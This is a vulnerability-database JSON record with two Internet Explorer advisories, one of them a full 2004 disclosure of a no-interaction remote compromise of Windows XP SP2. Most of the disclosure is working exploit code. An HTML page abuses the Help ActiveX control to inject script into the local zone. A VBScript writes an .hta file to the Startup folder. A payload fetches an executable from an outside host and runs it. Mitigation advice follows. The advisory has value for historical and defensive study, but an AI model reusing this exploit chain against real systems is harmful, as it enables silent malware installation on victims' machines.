{"securityvulns": [{"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "The DHTML Edit and Help ActiveX controls allow code injection into the context of a different server. By combining these vulnerabilities it's possible to execute code in the Local Machine zone. This vulnerability can potentially be used for silent spyware/adware installation.", "modified": "2005-02-09T00:00:00", "published": "2005-02-09T00:00:00", "id": "SECURITYVULNS:VULN:4264", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4264", "title": "Microsoft Internet Explorer DHTML Edit and Help ActiveX cross-site scripting", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "\r\n\r\nMicrosoft Internet Explorer SP2 Fully Automated Remote Compromise\r\n\r\nDec 21, 2004\r\n\r\n\r\nVulnerable\r\n----------\r\n- Microsoft Internet Explorer 6.0\r\n- Microsoft Windows XP Pro SP2\r\n- Microsoft Windows XP Home SP2\r\n\r\n\r\nNot Tested\r\n------------------------\r\n- Microsoft Windows 98\r\n- Microsoft Internet Explorer 5.x\r\n- Microsoft Windows 2003 Server\r\n\r\n \r\n\r\nSeverity\r\n---------\r\nCritical - Remote code execution, no user intervention\r\n\r\n\r\nIntro\r\n------\r\nAlthough hundreds of millions of dollars have been spent on securing SP2, perfection is impossible.\r\nThrough the joint effort of Michael Evanchik (http://www.michaelevanchik.com) and Paul from Greyhats\r\nSecurity (http://greyhats.cjb.net), a very critical vulnerability has been developed that can compromise a\r\nuser's system without the need for user interaction besides visiting the malicious page. The vulnerability\r\nis not actually a vulnerability in itself, but rather it uses multiple known holes in SP2 including Help\r\nActiveX Control Related Topics Zone Security Bypass Vulnerability and Help ActiveX Control Related Topics\r\nCross Site Scripting Vulnerability. 
\r\n\r\n\r\nTech Stuff and Explanation\r\n--------------------------\r\n\r\n1. Create a webpage with the following code:\r\n\r\nsp2rc.htm\r\n---------------------------------------------------------------------\r\n<OBJECT id="localpage" type="application/x-oleobject"\r\nclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%\r\nstyle="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194"\r\nwidth="7%">\r\n<PARAM name="Command" value="Related Topics, MENU">\r\n<PARAM name="Button" value="Text:Just a button">\r\n<PARAM name="Window" value="$global_blank">\r\n<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">\r\n</OBJECT>\r\n\r\n<OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"\r\nheight=7%\r\nstyle="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194"\r\nwidth="7%">\r\n<PARAM name="Command" value="Related Topics, MENU">\r\n<PARAM name="Button" value="Text:Just a button">\r\n<PARAM name="Window" value="$global_blank">\r\n<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script\r\nlanguage=\\\"vbscript\\\"\r\nsrc=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>\r\n</OBJECT>\r\n\r\n<script>\r\nlocalpage.HHClick();\r\nsetTimeout("inject.HHClick()",100);\r\n</script>\r\n---------------------------------------------------------------------\r\n\r\nExplanation of above code:\r\nThe first object (id: localpage) tells hhctrl.ocx to open a help popup window to the location\r\nC:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. This file was chosen because it is treated as the\r\nlocal zone and it doesn't have any script to mess us up. On some computers an error is shown before the\r\npopup. This is the user's only chance to prevent the vulnerability from working. 
If the user were to force\r\nhis computer to shut down at this point, the user would be unaffected by the exploit.\r\n\r\nThe second object (id: inject) tells the help popup to navigate to a javascript protocol, which executes.\r\nThus, cross site scripting has just taken place. A script tag that uses a remote file is written to the\r\npage, and writehta.txt (below) is executed in the unsecured local zone.\r\n\r\nIn the script, HHClick is able to be used to automate the vulnerability. This is more effective than the\r\npreviously described method of requiring a user to click on a button.\r\n\r\n\r\n2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the user's startup folder. See\r\nMichael Evanchik's analysis of the drag and drop vulnerability for an explanation on adodb recordset.\r\n\r\nwritehta.txt\r\n---------------------------------------------------------------------\r\nDim Conn, rs\r\nSet Conn = CreateObject("ADODB.Connection")\r\nConn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _\r\n"Dbq=http://www.malware.com;" & _\r\n"Extensions=asc,csv,tab,txt;" & _\r\n"Persist Security Info=False"\r\nDim sql\r\nsql = "SELECT * from foobar.txt"\r\nset rs = conn.execute(sql)\r\nset rs =CreateObject("ADODB.recordset")\r\nrs.Open "SELECT * from foobar.txt", conn\r\nrs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta",\r\nadPersistXML\r\nrs.close\r\nconn.close\r\nwindow.close\r\n---------------------------------------------------------------------\r\n\r\n\r\n3. f00bar.txt (thanks malware for hosting this file) is the file requested by the adodb recordset (again,\r\nread the drag and drop analysis at www.michaelevanchik.com for an explanation on how this works and why\r\nthe f00bar.txt looks like it does). Because there is absolutely no limit on what you can do in an hta file,\r\nan old, yet effective method of requesting and saving a file to the user's hd is used. 
From that, a wscript\r\nshell is created and used to run the program. And now, ladies and gentlemen, we have compromised the user's\r\nmachine.\r\n\r\nf00bar.txt\r\n---------------------------------------------------------------------\r\n"meaning less shit i had to put here"\r\n"<script language=vbscript> crap = """\r\n""": on error resume next: crap = """\r\n""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""\r\n""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : crap="""\r\n""" : o.send : crap="""\r\n""" : set s = createobject(""adodb.stream"") : crap="""\r\n""" : s.type=1 : crap="""\r\n""" : s.open : crap="""\r\n""" : s.write o.responseBody : crap="""\r\n""" : s.savetofile ""C:\malware.exe"",2 : crap="""\r\n""" : Set ws = CreateObject(""WScript.Shell"") : crap="""\r\n""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""\r\n"""</script> crap="""\r\n---------------------------------------------------------------------\r\n\r\n\r\n4. Upload hhctrl.ocx for the computers that don\u2019t happen to have this control. All XP's seem to have\r\nthis by default; some win2k3's do not (according to Michael Evanchik).\r\n\r\n\r\nProof of Concept?\r\n------------------\r\n- http://freehost07.websamba.com/greyhats/sp2rc.htm\r\n\r\n- If an error is shown, press OK. This is normal.\r\n\r\n- Notice in your startup menu a new file called Microsoft Office.hta. When run, this file will download\r\nand launch a harmless executable (which includes a pretty neat fire animation) \r\n\r\n \r\n\r\nVendor Recommendations\r\n----------------------\r\n- Like Michael Evanchik said in his previous analysis, Microsoft needs to apply XP Service Pack 2's local\r\nzone lockdown to .HTA files as well.\r\n\r\n- This might be a little farfetched, but it would solve a lot of problems: Take out the startup folder and\r\nonly support running files during startup through the registry. 
The startup folder is a major part of this\r\nvulnerability and I can almost guarantee it will be used for another remote compromise.\r\n\r\n- Microsoft could possibly take HTA files out altogether. I have not seen them used for anything beyond\r\nhacking.\r\n\r\n- No vulnerability is too small or too insignificant to be taken seriously. Treat every vulnerability as\r\nif it could be dangerous. \r\n\r\n \r\n\r\nUser Recommendations\r\n---------------------\r\n- Disable hta files.\r\n- Get yourself antivirus software. I recommend Symantec because once they get their lazy asses off the\r\ncouch and fix some of this stuff you will be a lot better off.\r\n- Disable active scripting in Internet Explorer. If nothing else, do this.\r\n- Do not use Internet Explorer, use Mozilla Firebird (now known as Firefox, www.mozilla.org)\r\n\r\n \r\n\r\nCredit\r\n------\r\nPaul from Greyhats\r\nMichael Evanchik\r\nHttp equiv (thanks for allowing me to use your server for f00bar.txt)\r\n\r\n\r\nGreets\r\n------\r\n- Liu Die Yu (all the work you've done is amazing)\r\n\r\n\r\nContact\r\n-------\r\npaul@greyhats.cjb.net\r\nhttp://greyhats.cjb.net\r\nhttp://michaelevanchik.com", "modified": "2004-12-27T00:00:00", "published": "2004-12-27T00:00:00", "id": "SECURITYVULNS:DOC:7451", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7451", "title": "Microsoft Internet Explorer SP2 Fully Automated Remote Compromise", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}